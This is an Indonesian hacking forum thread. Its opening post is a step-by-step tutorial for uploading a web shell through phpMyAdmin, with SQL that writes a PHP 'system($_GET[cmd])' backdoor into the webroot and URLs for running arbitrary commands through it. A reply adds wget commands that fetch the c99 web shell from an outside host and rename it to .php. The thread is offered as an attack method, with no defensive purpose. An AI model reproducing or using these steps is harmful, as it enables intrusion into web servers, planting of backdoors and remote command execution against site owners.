Tutorial Upload Shell From PhpMyAdmin

[shad.hckr]

Kemaren-kemaren aku dah bikin video tutorial hacking make Angry IP scanner trus dapetin akses database. Nah sekarang aku mau bagi cara buat upload shell lewat PhpMyAdmin.

Langkah pertama yang kudu kita lakuin setelah Login ke database, masuk ke SQL Query. gak perlu masuk database. langsung aja masuk SQL Query.

Langkah kedua, kita copas code berikut :

Code: Select all

use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<? $cmd = $_GET["cmd"]; if (!empty($cmd)) { echo "<pre>"; system($cmd); echo "</pre>"; exit; } ?>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/cmd.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

Langkah ketiga, langsung kita buka aja di browser. misal :

Code: Select all

    http://sh4dhckr.com/cmd.php

kalo hasilnya bukan 404, berarti file udah ditanem.

Langkah ke-empat, kita eksekusi cmd lewat file tadi make perintah :

Code: Select all

    http://sh4dhckr.com/cmd.php?cmd=[command-yang-mau-dieksekusi]

udah cuman gitu ajah kok caranya.

salam.

[nyelonong_boy]

berarti ga bisa make shell c99 dll ya?
trus exportnya ga mesti di C:/xampp/htdocs/ kan?

[3xtr3m3b0y]

berarti ga bisa make shell c99 dll ya?

melalui mini webshell yg sdh dibuat via phpmyadmin td, bisa kita jadikan batu loncatan utk dpt menggunakan shell c99 or sejenisnya jika mmg sdh sangat familiar dgn webshell tsb.

jika OSx menggunakan Unix Base, tinggal ketikkan ini sbg contoh:

Code: Select all

http://sh4dhckr.com/cmd.php?cmd=wget http://www.sumber.com/c99.txt
http://sh4dhckr.com/cmd.php?cmd=mv c99.txt c99.php

trus exportnya ga mesti di C:/xampp/htdocs/ kan?

lokasi yg dituju harus memberikan izin menulis, tp sbaiknya ttp berada pada lokasi webroot agar dpt diakses nntx...

[nyelonong_boy]

waw, sangat jelas.. makasih master2 sekalian :love: